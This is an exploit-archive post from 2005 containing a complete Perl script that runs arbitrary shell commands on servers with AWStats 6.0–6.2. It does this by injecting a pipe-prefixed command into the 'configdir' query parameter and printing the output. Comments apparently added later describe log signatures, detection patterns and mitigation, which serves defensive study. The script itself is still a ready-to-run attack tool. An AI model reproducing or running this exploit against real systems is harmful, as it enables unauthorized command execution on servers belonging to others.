AWStats "configdir" Remote Command Execution Exploit (Perl script)
@ Exploits -> Other     Jan 25 2005, 19:10 (UTC+0)
furcalor writes:
 #!/usr/bin/perl
#---GHC---------------------------------#
#Remote command execution exploit #
#Product:                                        #
#Advanced Web Statistics 6.0 - 6.2    #
#URL:http://awstats.sourceforge.net  #
#Greets & respects to our friends:     #
#1dt.w0lf and all rst.void.ru              #
#Special greets 2 d0G4                    #
#& cr0n for link on bugtraq               #
#---not-PRIVATE-already--------------#
# bug found by iDEFENSE                 #
# http://www.idefense.com/             #
# application/poi/display?                 #
# id=185&type=vulnerabilities          #
# &flashstatus=true                         #
#-----------------------------------------#

use IO::Socket;
# Usage text printed on every run. It names the affected product range
# (Advanced Web Statistics 6.0 - 6.2) and the three expected arguments:
# host, CGI path, and a command string.
$banner = "
#################################################################
GHC 2005
Remote command execution exploit for:
Advanced Web Statistics 6.0 - 6.2
Usage:
>perl ./GHCaws.pl www.server.net /cgi-bin/awredir.pl \"uname -a\"
#################################################################
";

# Name of the query-string parameter the request abuses. For defenders this
# is the field to watch in access logs and WAF rules.
$bug_param = 'configdir';
# Marker words echoed before and after the command output so the client can
# cut the output out of the surrounding HTTP response. Both words also travel
# in the request's query string, which makes them usable as log signatures.
$id_start = 'b_exp';
$id_exit = 'e_exp';
# Print flag: 0 until Print_Report sees the start marker, then 1.
$id_print = 0;
# Assigned here but not referenced anywhere else in this listing.
$http_head = "\n\n";

# Filter one line of the HTTP response and print only the part that lies
# between the two marker words held in $id_start and $id_exit.
#
#   $_[0]  - one line read from the socket.
#
# Reads and updates the package globals $id_start, $id_exit and $id_print.
# The end marker is tested first, so a line carrying it ends the whole
# script before anything from that line is printed. Matching is
# case-insensitive. For defenders, a response body containing both marker
# words around command output is a sign that the request succeeded.
sub Print_Report {
    $str = shift;

    # End marker reached: stop the program, not just this sub.
    exit if $str =~ /$id_exit/i;

    # Start marker reached: strip the marker text itself and enable
    # printing for this line and every line after it.
    if ($str =~ /$id_start/i) {
        $str =~ s/$id_start//gi;
        $id_print = 1;
    }

    print $str if $id_print == 1;
}

# Send the single crafted GET request and stream the reply through
# Print_Report.
#
# Takes no arguments; reads the package globals $server, $dir, $bug_param
# and $expl, and stores the connection in the global $socket.
#
# Detection: in web-server access logs this is one GET for the statistics
# CGI whose query string is "configdir=" followed by a pipe character (raw,
# or %7C if something re-encodes it) and ending in "%00", with the words
# b_exp and e_exp inside the value. A legitimate configdir value is a
# directory path and has no reason to contain any of these.
sub ConnectServer {
# Plain TCP to port 80 only; the port is hard-coded and there is no TLS.
# A failed connect ends the script with the bare message "Error".
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Error\n";
# Request line: GET <path>?configdir=<value> HTTP/1.1
# Every line is terminated with a bare "\n" rather than CRLF.
print $socket "GET $dir".'?'.$bug_param.'='."$expl HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
# "Connection: close" asks the server to close after replying, which is
# what lets the read loop below reach end-of-file.
print $socket "Connection: close\n\n";
# Read the response line by line. The loop ends at EOF, or earlier when
# Print_Report calls exit on seeing the end marker.
while ($report = <$socket>) {
&Print_Report("$report");
}
}


# Script entry: print the banner, read three command-line arguments, build
# the configdir value and send it.
#
# Mitigation for operators of the affected product: run a release newer than
# the 6.0 - 6.2 range named in the header, and keep the statistics CGI behind
# authentication or an address allow-list rather than open to the internet.
print "$banner";
# All three arguments must be true in Perl's sense (so "0" or an empty string
# counts as missing). If any is missing the script exits without a message.
if ($ARGV[0] && $ARGV[1] && $ARGV[2]) {
$server = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2]; }
else {
exit;
}

# Value sent in the configdir parameter. Its shape is:
#   |echo ;echo b_exp;<cmd>;echo e_exp;%00
# NOTE(review): the leading "|" suggests the value ends up in a Perl open()
# call on the server that treats it as a pipe to a command; confirm against
# the AWStats source. The trailing %00 presumably cuts off whatever the
# server appends after the value; that cannot be verified from this listing.
$expl = '|echo '.''.';echo '.$id_start.';'.$cmd.';echo '.$id_exit.';%00';
# As written, the pattern is the literal capital letter W, so this replaces
# only that character with "%57"; every other character, including spaces
# and the pipe, goes onto the wire unchanged.
$expl =~ s/W/"%".sprintf("%x",ord($&))/eg;
&ConnectServer;
